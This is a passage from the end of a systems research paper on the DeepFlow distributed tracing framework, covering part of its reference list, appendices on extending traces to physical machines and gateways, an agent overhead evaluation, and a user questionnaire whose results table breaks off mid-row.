Mechanism\nfor Performance Diagnosis. In Proceedings of the 2015 USENIX Conference on\nUsenix Annual Technical Conference (USENIX ATC ’15) . USENIX Association,\nUSA, 139–150.\n[27] Ryan Eberhardt. 2023. My First Kernel Module: A Debugging Nightmare. (Jan.\n2023). https://reberhardt.com/blog/2020/11/18/my-first-kernel-module.html[28] eBPF. 2023. eBPF - extended Berkeley Packet Filter. (Jan. 2023). https://ebpf.io/\n[29] eBPF. 2023. eBPF Applications Landscape. (Jan. 2023). https://ebpf.io/\napplications\n[30] Google Kubernetes Engine(GKE). 2023. Create and manage Tags in GKE. (Jan.\n2023). https://cloud.google.com/kubernetes-engine/docs/how-to/tags\n[31] Tânia Esteves, Francisco Neves, Rui Oliveira, and João Paulo. 2021. CAT: Content-\nAware Tracing and Analysis for Distributed Systems. In Proceedings of the\n22nd International Middleware Conference (Middleware ’21) . Association for\nComputing Machinery, New York, NY, USA, 223–235. https://doi.org/10.1145/\n3464298.3493396\n[32] Inc. F5. 2022. NGINX: Advanced Load Balancer, Web Server, & Reverse Proxy.\n(Nov. 2022). https://www.nginx.com\n[33] Flask. 2022. Flask - The Python micro framework for building web applications.\n(Nov. 2022). https://github.com/pallets/flask\n[34] Rodrigo Fonseca, George Porter, Randy H. Katz, Scott Shenker, and Ion Stoica.\n2007. X-Trace: A Pervasive Network Tracing Framework. In Proceedings of\nthe 4th USENIX Conference on Networked Systems Design and Implementation\n(NSDI’07) . USENIX Association, USA, 20.\n[35] Apache Software Foundation. 2023. KAFKA PROTOCOL GUIDE. (Jan. 2023).\nhttps://kafka.apache.org/protocol.html\n[36] Apache Software Foundation. 2023. Remote communication details of\nDubbo. (Jan. 2023). https://dubbo.apache.org/en/docs/v2.7/dev/implementation/\n#remote-communication-details\n[37] Cloud Native Computing Foundation. 2022. Production-Grade Container Or-\nchestration. (Nov. 2022). https://kubernetes.io/\n[38] Cloud Native Computing Foundation. 2023. Cloud Native Landscape. (Jan. 2023).\nhttps://landscape.cncf.io/\n[39] Django Software Foundation. 2022. Django: The web framework for perfection-\nists with deadlines. (Nov. 2022). https://www.djangoproject.com\n[40] Open Infrastructure Foundation. 2022. OpenStack: Open Source Cloud Com-\nputing Infrastructure. (Nov. 2022). https://www.openstack.org/\n[41] Neves Francisco, Machado Nuno, and Pereira José. 2023. fntneves/falcon: Falcon:\nA practical log-based analysis tool for distributed systems. (Jan. 2023). https:\n//github.com/fntneves/falcon\n[42] Amazon GameLift. 2023. Dedicated server management for session-based\nmultiplayer games. (Jan. 2023). https://aws.amazon.com/gamelift/\n[43] Yu Gan, Mingyu Liang, Sundar Dev, David Lo, and Christina Delimitrou. 2021.\nSage: Practical and Scalable ML-Driven Performance Debugging in Microser-\nvices. In Proceedings of the 26th ACM International Conference on Architec-\ntural Support for Programming Languages and Operating Systems (ASPLOS\n’21). Association for Computing Machinery, New York, NY, USA, 135–151.\nhttps://doi.org/10.1145/3445814.3446700\n[44] Yu Gan, Yanqi Zhang, Dailun Cheng, Ankitha Shetty, Priyal Rathi, Nayan Katarki,\nAriana Bruno, Justin Hu, Brian Ritchken, Brendon Jackson, et al .2019. An\nOpen-Source Benchmark Suite for Microservices and Their Hardware-Software\nImplications for Cloud & Edge Systems. In Proceedings of the Twenty-Fourth\nInternational Conference on Architectural Support for Programming Languages\nand Operating Systems (ASPLOS ’19) . Association for Computing Machinery,\nNew York, NY, USA, 3–18. https://doi.org/10.1145/3297858.3304013\n[45] Kaihui Gao, Chen Sun, Shuai Wang, Dan Li, Yu Zhou, Hongqiang Harry Liu,\nLingjun Zhu, and Ming Zhang. 2022. Buffer-based End-to-end Request Event\nMonitoring in the Cloud. In 19th USENIX Symposium on Networked Systems\nDesign and Implementation (NSDI 22) . USENIX Association, Renton, WA, 829–\n843. https://www.usenix.org/conference/nsdi22/presentation/gao-kaihui\n[46] Xiongzi Ge, Yi Liu, David H.C. Du, Liang Zhang, Hongguang Guan, Jian Chen,\nYuping Zhao, and Xinyu Hu. 2014. OpenANFV: Accelerating Network Function\nVirtualization with a Consolidated Framework in Openstack. In Proceedings\nof the 2014 ACM Conference on SIGCOMM (SIGCOMM ’14) . Association for\nComputing Machinery, New York, NY, USA, 353–354. https://doi.org/10.1145/\n2619239.2631426\n[47] Francis Giraldeau and Michel Dagenais. 2016. Wait Analysis of Distributed\nSystems Using Kernel Tracing. IEEE Transactions on Parallel and Distributed\nSystems 27, 8 (2016), 2450–2461. https://doi.org/10.1109/TPDS.2015.2488629\n[48] go.dev. 2023. The Go Programming Language. https://go.dev/. (July 2023).\n[49] Google. 2022. TensorFlow - An end-to-end machine learning platform. (Nov.\n2022). https://www.tensorflow.org/\n[50] HAProxy. 2023. HAProxy Documentation. (Jan. 2023). http://docs.haproxy.org/\n2.7/configuration.html#7.3.6-unique-id\n[51] HAProxy. 2023. The Reliable, High Performance TCP/HTTP Load Balancer.\n(Jan. 2023). http://www.haproxy.org/\n[52] Red Hat. 2022. Red Hat OpenShift makes container orchestration easier. (Nov.\n2022). https://www.redhat.com/en/technologies/cloud-computing/openshift\n[53] HelmVMware. 2023. The package manager for Kubernetes. (July 2023). Retrieved\nJul, 2023 from https://helm.sh/\n[54] Jiamin Huang, Barzan Mozafari, and Thomas F. Wenisch. 2017. Statistical Analy-\nsis of Latency Through Semantic Profiling. In Proceedings of the Twelfth European\nConference on Computer Systems (EuroSys ’17) . Association for Computing Ma-\nchinery, New York, NY, USA, 64–79. https://doi.org/10.1145/3064176.3064179\n13ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA Junxian Shen et al.\n[55] Lexiang Huang and Timothy Zhu. 2021. Tprof: Performance Profiling via Struc-\ntural Aggregation and Automated Analysis of Distributed Systems Traces. In\nProceedings of the ACM Symposium on Cloud Computing (SoCC ’21) . Association\nfor Computing Machinery, New York, NY, USA, 76–91. https://doi.org/10.1145/\n3472883.3486994\n[56] Peng Huang, Chuanxiong Guo, Jacob R. Lorch, Lidong Zhou, and Yingnong\nDang. 2018. Capturing and Enhancing in Situ System Observability for Failure\nDetection. In Proceedings of the 13th USENIX Conference on Operating Systems\nDesign and Implementation (OSDI’18) . USENIX Association, USA, 1–16.\n[57] International Business Machines Corporation (IBM) and Eurotech. 2023. MQTT\nV3.1 Protocol Specification. (Jan. 2023). https://public.dhe.ibm.com/software/\ndw/webservices/ws-mqtt/mqtt-v3r1.html\n[58] Internet Engineering Task Force (IETF). 2023. RFC 1035. (Jan. 2023). https:\n//www.rfc-editor.org/rfc/rfc1035\n[59] Internet Engineering Task Force (IETF). 2023. RFC 7231. (Jan. 2023). https:\n//www.rfc-editor.org/rfc/rfc7231\n[60] Internet Engineering Task Force (IETF). 2023. RFC 7540. (Jan. 2023). https:\n//www.rfc-editor.org/rfc/rfc7540\n[61] Istio. 2023. Bookinfo Application. (Jan. 2023). https://istio.io/latest/docs/\nexamples/bookinfo/\n[62] Jaeger. 2023. Jaeger: open source, end-to-end distributed tracing. (Jan. 2023).\nhttps://www.jaegertracing.io/\n[63] Yurong Jiang, Lenin Ravindranath Sivalingam, Suman Nath, and Ramesh Govin-\ndan. 2016. WebPerf: Evaluating What-If Scenarios for Cloud-Hosted Web Ap-\nplications. In Proceedings of the 2016 ACM SIGCOMM Conference (SIGCOMM\n’16). Association for Computing Machinery, New York, NY, USA, 258–271.\nhttps://doi.org/10.1145/2934872.2934882\n[64] Jonathan Kaldor, Jonathan Mace, Michał Bejda, Edison Gao, Wiktor Kuropatwa,\nJoe O’Neill, Kian Win Ong, Bill Schaller, Pingjia Shan, Brendan Viscomi, Vinod\nVenkataraman, Kaushik Veeraraghavan, and Yee Jiun Song. 2017. Canopy: An\nEnd-to-End Performance Tracing And Analysis System. In Proceedings of the\n26th Symposium on Operating Systems Principles (SOSP ’17) . Association for\nComputing Machinery, New York, NY, USA, 34–50. https://doi.org/10.1145/\n3132747.3132749\n[65] Suman Karumuri. 2023. PinTrace: Distributed Tracing at Pinterest. (August 2016).\n(Jan. 2023). https://www.slideshare.net/mansu/pintrace-advanced-aws-meetup\n[66] The Linux Kernel. 2023. bpf(2) — Linux manual page. (Jan. 2023). https:\n//man7.org/linux/man-pages/man2/bpf.2.html\n[67] The Linux Kernel. 2023. eBPF verifier. (Jan. 2023). https://www.kernel.org/doc/\nhtml/latest/bpf/verifier.html\n[68] The Linux Kernel. 2023. Kernel Probes (Kprobes). (Jan. 2023). https://www.\nkernel.org/doc/html/latest/trace/kprobes.html\n[69] The Linux Kernel. 2023. Linux Socket Filtering aka Berkeley Packet Filter (BPF).\n(Jan. 2023). https://www.kernel.org/doc/html/latest/networking/filter.html\n[70] The Linux Kernel. 2023. Uprobe-tracer: Uprobe-based Event Tracing. (Jan. 2023).\nhttps://www.kernel.org/doc/html/latest/trace/uprobetracer.html\n[71] The Linux Kernel. 2023. Using the Linux Kernel Tracepoints. (Jan. 2023).\nhttps://www.kernel.org/doc/html/latest/trace/tracepoints.html\n[72] Chung Hwan Kim, Junghwan Rhee, Hui Zhang, Nipun Arora, Guofei Jiang, Xi-\nangyu Zhang, and Dongyan Xu. 2014. IntroPerf: Transparent Context-Sensitive\nMulti-Layer Performance Inference Using System Stack Traces. In The 2014 ACM\nInternational Conference on Measurement and Modeling of Computer Systems\n(SIGMETRICS ’14) . Association for Computing Machinery, New York, NY, USA,\n235–247. https://doi.org/10.1145/2591971.2592008\n[73] Kubernetes. 2023. Labels and Selectors. (Jan. 2023). https://kubernetes.io/docs/\nconcepts/overview/working-with-objects/labels/\n[74] PIXIE labs. 2022. Instantly troubleshoot your applications on Kubernetes. (July\n2022). Retrieved Feb, 2023 from https://pixielabs.ai/\n[75] Chien-An Lai, Josh Kimball, Tao Zhu, Qingyang Wang, and Calton Pu. 2017.\nmilliScope: A Fine-Grained Monitoring Framework for Performance Debugging\nof n-Tier Web Services. In 2017 IEEE 37th International Conference on Distributed\nComputing Systems (ICDCS) . IEEE, USA, 92–102. https://doi.org/10.1109/ICDCS.\n2017.228\n[76] AWS Lambda. 2023. Using AWS Lambda with other services. (Jan. 2023).\nhttps://docs.aws.amazon.com/lambda/latest/dg/lambda-services.html\n[77] Pedro Las-Casas, Jonathan Mace, Dorgival Guedes, and Rodrigo Fonseca. 2018.\nWeighted Sampling of Execution Traces: Capturing More Needles and Less\nHay. In Proceedings of the ACM Symposium on Cloud Computing (SoCC ’18) .\nAssociation for Computing Machinery, New York, NY, USA, 326–332. https:\n//doi.org/10.1145/3267809.3267841\n[78] Pedro Las-Casas, Giorgi Papakerashvili, Vaastav Anand, and Jonathan Mace.\n2019. Sifter: Scalable Sampling for Distributed Traces, without Feature Engi-\nneering. In Proceedings of the ACM Symposium on Cloud Computing (SoCC\n’19). Association for Computing Machinery, New York, NY, USA, 312–324.\nhttps://doi.org/10.1145/3357223.3362736\n[79] Joshua B. Leners, Trinabh Gupta, Marcos K. Aguilera, and Michael Walfish.\n2013. Improving Availability in Distributed Systems with Failure Informers. In\nProceedings of the 10th USENIX Conference on Networked Systems Design andImplementation (nsdi’13) . USENIX Association, USA, 427–442.\n[80] Joshua Levin and Theophilus A. Benson. 2020. ViperProbe: Rethinking Microser-\nvice Observability with eBPF. In 2020 IEEE 9th International Conference on Cloud\nNetworking (CloudNet) . IEEE, USA, 1–8. https://doi.org/10.1109/CloudNet51028.\n2020.9335808\n[81] Ding Li, James Mickens, Suman Nath, and Lenin Ravindranath. 2015. Domino:\nUnderstanding Wide-Area, Asynchronous Event Causality in Web Applications.\nInProceedings of the Sixth ACM Symposium on Cloud Computing (SoCC ’15) .\nAssociation for Computing Machinery, New York, NY, USA, 182–188. https:\n//doi.org/10.1145/2806777.2806940\n[82] libbpf. 2023. Automated upstream mirror for libbpf stand-alone build.\nhttps://github.com/libbpf/libbpf. (July 2023).\n[83] Linux. 2023. BPF Type Format (BTF).\nhttps://www.kernel.org/doc/html/next/bpf/btf.html. (July 2023).\n[84] Linux. 2023. packet(7) — Linux manual page. (Jan. 2023). https://man7.org/\nlinux/man-pages/man7/packet.7.html\n[85] Linux. 2023. pidstat(1) — Linux manual page. (Jan. 2023). https://man7.org/\nlinux/man-pages/man1/pidstat.1.html\n[86] Chang Liu, Zhengong Cai, Bingshen Wang, Zhimin Tang, and Jiaxu Liu.\n2020. A protocol-independent container network observability analysis system\nbased on eBPF. In 2020 IEEE 26th International Conference on Parallel and Dis-\ntributed Systems (ICPADS) . IEEE, Hong Kong, 697–702. https://doi.org/10.1109/\nICPADS51040.2020.00099\n[87] LTTng. 2023. LTTng: an open source tracing framework for Linux. (Jan. 2023).\nhttps://lttng.org/\n[88] Liang Luo, Suman Nath, Lenin Ravindranath Sivalingam, Madan Musuvathi, and\nLuis Ceze. 2018. Troubleshooting Transiently-Recurring Problems in Production\nSystems with Blame-Proportional Logging. In Proceedings of the 2018 USENIX\nConference on Usenix Annual Technical Conference (USENIX ATC ’18) . USENIX\nAssociation, USA, 321–334.\n[89] Shutian Luo, Huanle Xu, Chengzhi Lu, Kejiang Ye, Guoyao Xu, Liping Zhang,\nJian He, and Chengzhong Xu. 2022. An In-Depth Study of Microservice Call\nGraph and Runtime Performance. IEEE Transactions on Parallel and Distributed\nSystems 33, 12 (2022), 3901–3914. https://doi.org/10.1109/TPDS.2022.3174631\n[90] LWN. 2023. A thorough introduction to eBPF. https://lwn.net/Articles/740157/.\n(July 2023).\n[91] Jonathan Mace and Rodrigo Fonseca. 2018. Universal Context Propagation for\nDistributed System Instrumentation. In Proceedings of the Thirteenth EuroSys\nConference (EuroSys ’18) . Association for Computing Machinery, New York, NY,\nUSA, Article 8, 18 pages. https://doi.org/10.1145/3190508.3190526\n[92] Jonathan Mace, Ryan Roelke, and Rodrigo Fonseca. 2015. Pivot Tracing: Dynamic\nCausal Monitoring for Distributed Systems. In Proceedings of the 25th Symposium\non Operating Systems Principles (SOSP ’15) . Association for Computing Machin-\nery, New York, NY, USA, 378–393. https://doi.org/10.1145/2815400.2815415\n[93] Steven McCanne and Van Jacobson. 1993. The BSD Packet Filter: A New Ar-\nchitecture for User-Level Packet Capture. In Proceedings of the USENIX Winter\n1993 Conference Proceedings on USENIX Winter 1993 Conference Proceedings\n(USENIX’93) . USENIX Association, USA, 2.\n[94] memcached. 2022. memcached - a distributed memory object caching system.\n(Nov. 2022). https://memcached.org/\n[95] Haibo Mi, Huaimin Wang, Hua Cai, Yangfan Zhou, Michael R. Lyu, and Zhen-\nbang Chen. 2012. P-Tracer: Path-Based Performance Profiling in Cloud Comput-\ning Systems. In 2012 IEEE 36th Annual Computer Software and Applications Con-\nference . IEEE, Izmir, Turkey, 509–514. https://doi.org/10.1109/COMPSAC.2012.69\n[96] Haibo Mi, Huaimin Wang, Yangfan Zhou, Michael Rung-Tsong Lyu, and Hua\nCai. 2013. Toward Fine-Grained, Unsupervised, Scalable Performance Diagnosis\nfor Production Cloud Computing Systems. IEEE Transactions on Parallel and\nDistributed Systems 24, 6 (2013), 1245–1255. https://doi.org/10.1109/TPDS.2013.\n21\n[97] Microsoft. 2023. Azure for gaming. (Jan. 2023). https://azure.microsoft.com/\nen-us/solutions/gaming/\n[98] Microsoft. 2023. Event Tracing for Windows | Microsoft Learn. (Jan.\n2023). https://learn.microsoft.com/en-us/windows-hardware/test/wpt/\nevent-tracing-for-windows\n[99] J. Mogul, R. Rashid, and M. Accetta. 1987. The Packet Filter: An Efficient Mech-\nanism for User-Level Network Code. In Proceedings of the Eleventh ACM Sym-\nposium on Operating Systems Principles (SOSP ’87) . Association for Computing\nMachinery, New York, NY, USA, 39–51. https://doi.org/10.1145/41457.37505\n[100] Naver. 2023. Bytecode Instrumentation, Not Requiring Code Modifica-\ntions. (Jan. 2023). https://pinpoint-apm.github.io/pinpoint/techdetail.html#\nhow-bytecode-instrumentation-works\n[101] Naver. 2023. Pinpoint | Leading Open-Source APM. (Jan. 2023). https:\n//pinpoint-apm.gitbook.io/pinpoint/\n[102] Nginx. 2023. Nginx Documentation - HTTP core module. (Jan. 2023). http:\n//nginx.org/en/docs/http/ngx_http_core_module.html\n[103] OpenTelemetry. 2023. High-quality, ubiquitous, and portable telemetry to enable\neffective observability. (Jan. 2023). https://opentelemetry.io/\n14Network-Centric Distributed Tracing with DeepFlow ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA\n[104] OpenTelemetry. 2023. Propagators Distribution. (Jan. 2023). https:\n//opentelemetry.io/docs/reference/specification/context/api-propagators/\n#propagators-distribution\n[105] OpenZipkin. 2023. B3-propagation. (Jan. 2023). https://github.com/openzipkin/\nb3-propagation\n[106] Oracle. 2023. MySQL Client/Server Protocol. (Jan. 2023). https://dev.mysql.com/\ndoc/dev/mysql-server/latest/PAGE_PROTOCOL.html\n[107] Cuong Pham, Long Wang, Byung Chul Tak, Salman Baset, Chunqiang Tang,\nZbigniew Kalbarczyk, and Ravishankar K. Iyer. 2017. Failure Diagnosis for\nDistributed Systems Using Targeted Fault Injection. IEEE Transactions on Parallel\nand Distributed Systems 28, 2 (2017), 503–516. https://doi.org/10.1109/TPDS.\n2016.2575829\n[108] Linux posts. 2023. Linux kernel crash dump analysis. (Jan. 2023). http://\nsklinuxblog.blogspot.com/2018/06/linux-kernel-crash-dump-analysis.html\n[109] Kubernetes Documentation-Configuration Best Practices. 2022. (July 2022).\nRetrieved July, 2022 from https://kubernetes.io/docs/concepts/configuration/\noverview/\n[110] Envoy Project. 2022. Envoy Proxy - Home. (Nov. 2022). https://www.envoyproxy.\nio/\n[111] Envoy Project. 2023. HTTP header manipulation. (Jan. 2023).\nhttps://www.envoyproxy.io/docs/envoy/latest/configuration/http/http_\nconn_man/headers#x-request-id\n[112] Prometheus. 2023. From metrics to insight. (Jan. 2023). https://prometheus.io/\n[113] Redis. 2022. Redis - Remote Dictionary Server. (Nov. 2022). https://redis.io/\n[114] Redis. 2023. Redis serialization protocol (RESP) specification. (Jan. 2023). https:\n//redis.io/docs/reference/protocol-spec/\n[115] Daniele Rogora, Antonio Carzaniga, Amer Diwan, Matthias Hauswirth, and\nRobert Soulé. 2020. Analyzing System Performance with Probabilistic Per-\nformance Annotations. In Proceedings of the Fifteenth European Conference on\nComputer Systems (EuroSys ’20) . Association for Computing Machinery, New\nYork, NY, USA, Article 43, 14 pages. https://doi.org/10.1145/3342195.3387554\n[116] Raja R. Sambasivan, Ilari Shafer, Jonathan Mace, Benjamin H. Sigelman, Rodrigo\nFonseca, and Gregory R. Ganger. 2016. Principled Workflow-Centric Tracing of\nDistributed Systems. In Proceedings of the Seventh ACM Symposium on Cloud\nComputing (SoCC ’16) . Association for Computing Machinery, New York, NY,\nUSA, 401–414. https://doi.org/10.1145/2987550.2987568\n[117] Raja R. Sambasivan, Alice X. Zheng, Michael De Rosa, Elie Krevat, Spencer Whit-\nman, Michael Stroucken, William Wang, Lianghong Xu, and Gregory R. Ganger.\n2011. Diagnosing Performance Changes by Comparing Request Flows. In 8th\nUSENIX Symposium on Networked Systems Design and Implementation (NSDI 11) .\nUSENIX Association, Boston, MA, 43–56. https://www.usenix.org/conference/\nnsdi11/diagnosing-performance-changes-comparing-request-flows\n[118] Bo Sang, Jianfeng Zhan, Gang Lu, Haining Wang, Dongyan Xu, Lei Wang,\nZhihong Zhang, and Zhen Jia. 2012. Precise, Scalable, and Online Request\nTracing for Multitier Services of Black Boxes. IEEE Transactions on Parallel and\nDistributed Systems 23, 6 (2012), 1159–1167. https://doi.org/10.1109/TPDS.2011.\n257\n[119] Arjun Satish, Thomas Shiou, Chuck Zhang, Khaled Elmeleegy, and Willy\nZwaenepoel. 2018. Scrub: Online Troubleshooting for Large Mission-Critical\nApplications. In Proceedings of the Thirteenth EuroSys Conference (EuroSys ’18) .\nAssociation for Computing Machinery, New York, NY, USA, Article 5, 15 pages.\nhttps://doi.org/10.1145/3190508.3190513\n[120] Ben Sigelman. 2023. Towards Turnkey Distributed Tracing\n(June 2016). (Jan. 2023). https://medium.com/opentracing/\ntowards-turnkey-distributed-tracing-5f4297d1736\n[121] Benjamin H. Sigelman, Luiz André Barroso, Mike Burrows, Pat Stephenson,\nManoj Plakal, Donald Beaver, Saul Jaspan, and Chandan Shanbhag. 2010. Dapper,\na Large-Scale Distributed Systems Tracing Infrastructure . Technical Report.\nGoogle, Inc. https://research.google.com/archive/papers/dapper-2010-1.pdf\n[122] SQLite. 2022. SQLite Home Page. (Nov. 2022). https://www.sqlite.org\n[123] Kun Suo, Yong Zhao, Wei Chen, and Jia Rao. 2018. vNetTracer: Efficient and\nProgrammable Packet Tracing in Virtualized Networks. In 2018 IEEE 38th Inter-\nnational Conference on Distributed Computing Systems (ICDCS) . IEEE, Vienna,\nAustria, 165–175. https://doi.org/10.1109/ICDCS.2018.00026\n[124] Sysdig. 2023. Security Tools for Containers, Kubernetes, and Cloud – Sysdig.\n(Jan. 2023). https://sysdig.com/\n[125] Open Telemetry. 2023. Open Telemetry’s Golang net/http wrapper package.\n(Jan. 2023). https://pkg.go.dev/go.opentelemetry.io/contrib/instrumentation/\nnet/http/otelhttp\n[126] Jörg Thalheim, Antonio Rodrigues, Istemi Ekin Akkus, Pramod Bhatotia,\nRuichuan Chen, Bimal Viswanath, Lei Jiao, and Christof Fetzer. 2017. Sieve:\nActionable Insights from Monitored Metrics in Distributed Systems. In Pro-\nceedings of the 18th ACM/IFIP/USENIX Middleware Conference (Middleware ’17) .\nAssociation for Computing Machinery, New York, NY, USA, 14–27. https:\n//doi.org/10.1145/3135974.3135977\n[127] Marcos A. M. Vieira, Matheus S. Castanho, Racyus D. G. Pacífico, Elerson R. S.\nSantos, Eduardo P. M. Câmara Júnior, and Luiz F. M. Vieira. 2020. Fast Packet\nProcessing with EBPF and XDP: Concepts, Code, Challenges, and Applications.ACM Comput. Surv. 53, 1, Article 16 (feb 2020), 36 pages. https://doi.org/10.1145/\n3371038\n[128] VMware. 2023. RabbitMQ: easy to use, flexible messaging and streaming. (July\n2023). Retrieved Jul, 2023 from https://www.rabbitmq.com/\n[129] W3C. 2023. Trace Context W3C Recommendation 23 November 2021. (Jan.\n2023). https://www.w3.org/TR/trace-context/\n[130] World Wide Web Consortium (W3C). 2023. Trace Context HTTP\nHeaders Format. (Jan. 2023). https://www.w3.org/TR/trace-context/\n#trace-context-http-headers-format\n[131] Adam Welc. 2021. Automated Code Transformation for Context Propagation\nin Go. In Proceedings of the 29th ACM Joint Meeting on European Software Engi-\nneering Conference and Symposium on the Foundations of Software Engineering\n(ESEC/FSE 2021) . Association for Computing Machinery, New York, NY, USA,\n1242–1252. https://doi.org/10.1145/3468264.3473918\n[132] Jianping Weng, Jessie Hui Wang, Jiahai Yang, and Yang Yang. 2018. Root\nCause Analysis of Anomalies of Multitier Services in Public Clouds. IEEE/ACM\nTransactions on Networking 26, 4 (2018), 1646–1659. https://doi.org/10.1109/\nTNET.2018.2843805\n[133] wrk2. 2022. wrk2 - A constant throughput, correct latency recording variant of\nwrk. (July 2022). Retrieved Feb, 2023 from https://github.com/giltene/wrk2\n[134] Stephen Yang, Seo Jin Park, and John Ousterhout. 2018. NanoLog: A Nanosecond\nScale Logging System. In Proceedings of the 2018 USENIX Conference on Usenix\nAnnual Technical Conference (USENIX ATC ’18) . USENIX Association, USA,\n335–349.\n[135] Yong Yang, Long Wang, Jing Gu, and Ying Li. 2022. Capturing Request Execution\nPath for Understanding Service Behavior and Detecting Anomalies without\nCode Instrumentation. IEEE Transactions on Services Computing 1, 1 (2022), 1–1.\nhttps://doi.org/10.1109/TSC.2022.3149949\n[136] Xiao Yu, Pallavi Joshi, Jianwu Xu, Guoliang Jin, Hui Zhang, and Guofei Jiang.\n2016. CloudSeer: Workflow Monitoring of Cloud Infrastructures via Inter-\nleaved Logs. In Proceedings of the Twenty-First International Conference on Ar-\nchitectural Support for Programming Languages and Operating Systems (ASP-\nLOS ’16) . Association for Computing Machinery, New York, NY, USA, 489–502.\nhttps://doi.org/10.1145/2872362.2872407\n[137] Jun Zhang, Robert Ferydouni, Aldrin Montana, Daniel Bittman, and Peter Alvaro.\n2021. 3MileBeach: A Tracer with Teeth. In Proceedings of the ACM Symposium\non Cloud Computing (SoCC ’21) . Association for Computing Machinery, New\nYork, NY, USA, 458–472. https://doi.org/10.1145/3472883.3486986\n[138] Yongle Zhang, Kirk Rodrigues, Yu Luo, Michael Stumm, and Ding Yuan. 2019.\nThe Inflection Point Hypothesis: A Principled Debugging Approach for Locating\nthe Root Cause of a Failure. In Proceedings of the 27th ACM Symposium on\nOperating Systems Principles (SOSP ’19) . Association for Computing Machinery,\nNew York, NY, USA, 131–146. https://doi.org/10.1145/3341301.3359650\n[139] Xu Zhao, Kirk Rodrigues, Yu Luo, Ding Yuan, and Michael Stumm. 2016. Non-\nIntrusive Performance Profiling for Entire Software Stacks Based on the Flow\nReconstruction Principle. In Proceedings of the 12th USENIX Conference on Oper-\nating Systems Design and Implementation (OSDI’16) . USENIX Association, USA,\n603–618.\n[140] Xu Zhao, Yongle Zhang, David Lion, Muhammad Faizan Ullah, Yu Luo, Ding\nYuan, and Michael Stumm. 2014. Lprof: A Non-Intrusive Request Flow Profiler\nfor Distributed Systems. In Proceedings of the 11th USENIX Conference on Oper-\nating Systems Design and Implementation (OSDI’14) . USENIX Association, USA,\n629–644.\n[141] Zipkin. 2023. Zipkin. (Jan. 2023). https://zipkin.io/\n15ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA Junxian Shen et al.\nAREQUESTS TRAVELING THROUGH A DATA\nCENTER\nAppendices are supporting material that has not been peer-reviewed.\nA.1 From End-Hosts to Gateways\nTraditional distributed tracing frameworks focus on applica- tion-\nlevel components. Traces generated by them can, at most, include\nsidecars like Envoy [ 110]. However, the tracing capabilities of Deep-\nFlow , which are built on top of the network information, extend\nbeyond this limitation. If we deploy the DeepFlow Agent on the\nend-hosts, we can extend the traces to the physical machines ,\nas shown in Figure 17. This is what the extended trace path will\nlook like: client processes ⇔sidecars⇔client Pods⇔client nodes\n⇔client physical machines ⇔server physical machines ⇔server\nnodes⇔server Pods⇔sidecars⇔server application processes.\nFigure 17: DeepFlow Agent extends traces to physical ma-\nchines.\nFigure 18: DeepFlow Agent extends traces to gateways.\nMost importantly, DeepFlow caninclude gateways in its traces .\nDeepFlow Agent can run directly on L7 gateways (such as server\nload balancers) and treat them like standard host machines. Using\nthe de facto standard, X-Request-IDs, we can easily track the re-\nquests across L7 gateways. On the other hand, since the majorityof the L4 gateways do not modify the TCP sequence, we can uti-\nlize it to trace the requests that traverse the gateway. If we mirror\nthe traffic on the top-of-rack switch to a physical machine dedi-\ncated to DeepFlow Agent, we can achieve coverage of the gateway\n(Figure 18).\nWe have now completed the full coverage of a request in the\ndata center.\n(a) Performance impact of DeepFlow Agent on the 50th latency.\n(b) Performance impact of DeepFlow Agent on the 90th latency.\nFigure 19: Performance impact of DeepFlow Agent on the\nthroughput and latency.\nB SUPPLEMENTARY EVALUATION OF\nDEEPFLOW AGENT\nIn this supplementary experiment, we evaluate DeepFlow Agent’s\nperformance impact on the monitored applications. This test is\nconducted in a single VM with 8 vCPUs and 16 GB of RAM. We\nutilize wrk2 [ 133] as the load generator and Nginx [ 32] as the\nserver. The performance impact is measured in three scenarios: no\nDeepFlow (denoted by Baseline), only running the eBPF module of\nDeepFlow Agent (denoted by eBPF), and executing the complete\nfunctionality of DeepFlow Agent (denoted by Agent). Then, we\nrecord the end-to-end latency as well as the CPU usage of the\nclient and the server. Note that, in this testbed evaluation, the\ncomputational workload of Nginx takes only about 1𝑚𝑠, which is\nconsiderably smaller than that of a real-world service. Thus, the\nperformance impact of DeepFlow is overestimated. In a production\napplication scenario, the influence of DeepFlow Agent will be much\nsmaller.\nFigure 19 shows the results. The baseline Nginx service gets a\nthroughput of 44,000RPS without enabling the DeepFlow Agent.\n16Network-Centric Distributed Tracing with DeepFlow ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA\n(a) Resource consumption when DeepFlow Agent is fully functioning.\n(b) Resource consumption with the eBPF module of DeepFlow .\n(c) Resource consumption at the baseline settings.\nFigure 20: Resource consumption of the client (wrk) and the\nserver (Nginx).It is, however, reduced to 31,000RPS when eBPF is activated. As\nmentioned previously, the reason for the decrease in throughput\nis that we evaluate DeepFlow under the theoretically strictest con-\nditions. When all features of DeepFlow Agent are turned on, the\nmaximum throughput drops to 27,000RPS.\nC UNPROCESSED DATA FROM THE\nQUESTIONNAIRE\nTo better understand how DeepFlow helps improve observability\nin production settings, we designed a questionnaire for users with\nthe following questions:\n(1)Is the distributed tracing framework you use open-source or\nself-developed?\n(2)How many kernel versions do you have in your online pro-\nduction environment?\n(3)How many programming languages are used in your project?\n(4)How many microservice components do you have in your\nproject?\n(5)How many lines of code does your project have for a single\napplication or a single microservice component?\n(6)Before using DeepFlow , how long did it take to instrument\na single program or a single microservice component?\n(7)Before using DeepFlow , how many lines of code did you need\nto modify for instrumenting a single program or a single\nmicroservice component (including framework initialization\nand connection)?\n(8)Compared with other distributed tracing frameworks, how\nmuch has DeepFlow reduced your workload?\n(9)Before using DeepFlow , what was the average time from\ndiscovering a fault to fixing the problem (including cross-\ndepartment communication time)?\n(10) Having deployed DeepFlow , what is the average time from\ndiscovering a fault to fixing the problem (including cross-\ndepartment communication time)?\n(11) Where has DeepFlow helped you the most?\nWe collected 10 valid results, which are shown in Table 4 and\nTable 5.\n17ACM SIGCOMM ’23, September 10, 2023, New York, NY, USA Junxian Shen et al.\nQ A1 A2 A3 A4 A5 A6 A7 A8 A9 A10\n1• O S O O O O S O O S\n2 2-5 5-10 2-5 2-5 Unknown 2-5 2-5 2-5 2-5 2-5\n3 2-5 2-5 2-5 2-5 2-5 2-5 2-5 2-5 2-5 2-5\n4 2-5 >100 5-10 >100 20-100 10-20 5-10 10-20 2-5 >100\n5 100-1k 3k-5k 3k-5k 3k-5k >5k >5k 